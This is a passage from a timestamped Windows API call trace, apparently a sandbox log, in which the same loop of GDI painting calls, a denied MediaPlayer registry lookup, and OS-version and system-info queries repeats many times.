dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.728] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.728] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.728] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.728] BeginPath (hdc=0x0) returned 0 [0017.729] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.729] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.729] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.729] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.729] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.729] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.729] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.729] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.729] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x40713 [0017.729] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf604027d [0017.729] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cb8 [0017.729] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cb9 [0017.729] CombineRgn (hrgnDst=0x1040cb8, hrgnSrc1=0x40713, hrgnSrc2=0xf604027d, iMode=1) returned 1 [0017.729] CombineRgn (hrgnDst=0x1040cb9, hrgnSrc1=0x40713, hrgnSrc2=0xf604027d, iMode=4) returned 2 [0017.729] CreateSolidBrush (color=0xff) returned 0x2100cb7 [0017.729] CreateSolidBrush (color=0xff0000) returned 0x1100cba [0017.729] DeleteObject (ho=0x1100cba) returned 1 [0017.729] DeleteObject (ho=0xf604027d) returned 1 [0017.729] DeleteObject (ho=0x40713) returned 1 [0017.729] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.729] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.729] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.729] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.729] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.729] BeginPath (hdc=0x0) returned 0 [0017.729] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.729] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.729] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.729] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.729] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.730] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.730] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.730] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.730] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf704027d [0017.730] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x1040713 [0017.730] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cbb [0017.730] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cbc [0017.730] CombineRgn (hrgnDst=0x1040cbb, hrgnSrc1=0xf704027d, hrgnSrc2=0x1040713, iMode=1) returned 1 [0017.730] CombineRgn (hrgnDst=0x1040cbc, hrgnSrc1=0xf704027d, hrgnSrc2=0x1040713, iMode=4) returned 2 [0017.730] CreateSolidBrush (color=0xff) returned 0x2100cba [0017.730] CreateSolidBrush (color=0xff0000) returned 0x1100cbd [0017.730] DeleteObject (ho=0x1100cbd) returned 1 [0017.730] DeleteObject (ho=0x1040713) returned 1 [0017.730] DeleteObject (ho=0xf704027d) returned 1 [0017.730] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.730] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.730] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.730] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.730] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.730] BeginPath (hdc=0x0) returned 0 [0017.730] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.730] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.730] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.730] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.730] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.730] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.731] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.731] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.731] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x2040713 [0017.731] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf804027d [0017.731] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cbe [0017.731] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cbf [0017.731] CombineRgn (hrgnDst=0x1040cbe, hrgnSrc1=0x2040713, hrgnSrc2=0xf804027d, iMode=1) returned 1 [0017.731] CombineRgn (hrgnDst=0x1040cbf, hrgnSrc1=0x2040713, hrgnSrc2=0xf804027d, iMode=4) returned 2 [0017.731] CreateSolidBrush (color=0xff) returned 0x2100cbd [0017.731] CreateSolidBrush (color=0xff0000) returned 0x1100cc0 [0017.731] DeleteObject (ho=0x1100cc0) returned 1 [0017.731] DeleteObject (ho=0xf804027d) returned 1 [0017.731] DeleteObject (ho=0x2040713) returned 1 [0017.731] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.731] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.731] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.731] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.731] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.731] BeginPath (hdc=0x0) returned 0 [0017.731] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.731] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.731] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.731] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.731] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.731] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.731] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.731] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.732] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf904027d [0017.732] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x3040713 [0017.732] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cc1 [0017.732] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cc2 [0017.732] CombineRgn (hrgnDst=0x1040cc1, hrgnSrc1=0xf904027d, hrgnSrc2=0x3040713, iMode=1) returned 1 [0017.732] CombineRgn (hrgnDst=0x1040cc2, hrgnSrc1=0xf904027d, hrgnSrc2=0x3040713, iMode=4) returned 2 [0017.732] CreateSolidBrush (color=0xff) returned 0x2100cc0 [0017.732] CreateSolidBrush (color=0xff0000) returned 0x1100cc3 [0017.732] DeleteObject (ho=0x1100cc3) returned 1 [0017.732] DeleteObject (ho=0x3040713) returned 1 [0017.732] DeleteObject (ho=0xf904027d) returned 1 [0017.732] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.732] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.732] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.732] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.732] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.732] BeginPath (hdc=0x0) returned 0 [0017.732] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.732] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.732] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.732] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.732] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.732] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.732] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.732] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.733] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x4040713 [0017.733] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xfa04027d [0017.733] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cc4 [0017.733] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cc5 [0017.733] CombineRgn (hrgnDst=0x1040cc4, hrgnSrc1=0x4040713, hrgnSrc2=0xfa04027d, iMode=1) returned 1 [0017.733] CombineRgn (hrgnDst=0x1040cc5, hrgnSrc1=0x4040713, hrgnSrc2=0xfa04027d, iMode=4) returned 2 [0017.733] CreateSolidBrush (color=0xff) returned 0x2100cc3 [0017.733] CreateSolidBrush (color=0xff0000) returned 0x1100cc6 [0017.733] DeleteObject (ho=0x1100cc6) returned 1 [0017.733] DeleteObject (ho=0xfa04027d) returned 1 [0017.733] DeleteObject (ho=0x4040713) returned 1 [0017.733] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.733] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.733] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.733] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.733] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.733] BeginPath (hdc=0x0) returned 0 [0017.733] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.733] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.733] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.733] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.733] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.733] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.733] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.733] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.734] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xfb04027d [0017.734] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x5040713 [0017.734] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cc7 [0017.734] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cc8 [0017.734] CombineRgn (hrgnDst=0x1040cc7, hrgnSrc1=0xfb04027d, hrgnSrc2=0x5040713, iMode=1) returned 1 [0017.734] CombineRgn (hrgnDst=0x1040cc8, hrgnSrc1=0xfb04027d, hrgnSrc2=0x5040713, iMode=4) returned 2 [0017.734] CreateSolidBrush (color=0xff) returned 0x2100cc6 [0017.734] CreateSolidBrush (color=0xff0000) returned 0x1100cc9 [0017.734] DeleteObject (ho=0x1100cc9) returned 1 [0017.734] DeleteObject (ho=0x5040713) returned 1 [0017.734] DeleteObject (ho=0xfb04027d) returned 1 [0017.734] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.734] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.734] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.734] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.734] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.734] BeginPath (hdc=0x0) returned 0 [0017.734] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.734] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.734] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.734] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.734] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.734] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.734] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.734] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.735] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x6040713 [0017.735] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xfc04027d [0017.735] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cca [0017.735] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ccb [0017.735] CombineRgn (hrgnDst=0x1040cca, hrgnSrc1=0x6040713, hrgnSrc2=0xfc04027d, iMode=1) returned 1 [0017.735] CombineRgn (hrgnDst=0x1040ccb, hrgnSrc1=0x6040713, hrgnSrc2=0xfc04027d, iMode=4) returned 2 [0017.735] CreateSolidBrush (color=0xff) returned 0x2100cc9 [0017.735] CreateSolidBrush (color=0xff0000) returned 0x1100ccc [0017.735] DeleteObject (ho=0x1100ccc) returned 1 [0017.735] DeleteObject (ho=0xfc04027d) returned 1 [0017.735] DeleteObject (ho=0x6040713) returned 1 [0017.735] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.735] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.735] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.735] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.735] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.735] BeginPath (hdc=0x0) returned 0 [0017.735] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.735] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.735] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.735] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.735] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.735] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.735] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.735] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.735] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xfd04027d [0017.735] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x7040713 [0017.735] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ccd [0017.736] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cce [0017.736] CombineRgn (hrgnDst=0x1040ccd, hrgnSrc1=0xfd04027d, hrgnSrc2=0x7040713, iMode=1) returned 1 [0017.736] CombineRgn (hrgnDst=0x1040cce, hrgnSrc1=0xfd04027d, hrgnSrc2=0x7040713, iMode=4) returned 2 [0017.736] CreateSolidBrush (color=0xff) returned 0x2100ccc [0017.736] CreateSolidBrush (color=0xff0000) returned 0x1100ccf [0017.736] DeleteObject (ho=0x1100ccf) returned 1 [0017.736] DeleteObject (ho=0x7040713) returned 1 [0017.736] DeleteObject (ho=0xfd04027d) returned 1 [0017.736] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.736] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.736] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.736] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.736] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.736] BeginPath (hdc=0x0) returned 0 [0017.736] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.736] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.736] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.736] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.736] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.736] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.736] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.736] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.736] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x8040713 [0017.736] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xfe04027d [0017.736] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cd0 [0017.736] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cd1 [0017.736] CombineRgn (hrgnDst=0x1040cd0, hrgnSrc1=0x8040713, hrgnSrc2=0xfe04027d, iMode=1) returned 1 [0017.736] CombineRgn (hrgnDst=0x1040cd1, hrgnSrc1=0x8040713, hrgnSrc2=0xfe04027d, iMode=4) returned 2 [0017.736] CreateSolidBrush (color=0xff) returned 0x2100ccf [0017.737] CreateSolidBrush (color=0xff0000) returned 0x1100cd2 [0017.737] DeleteObject (ho=0x1100cd2) returned 1 [0017.737] DeleteObject (ho=0xfe04027d) returned 1 [0017.737] DeleteObject (ho=0x8040713) returned 1 [0017.737] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.737] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.737] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.737] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.737] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.737] BeginPath (hdc=0x0) returned 0 [0017.737] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.737] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.737] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.737] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.737] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.737] GetWindowRect (in: 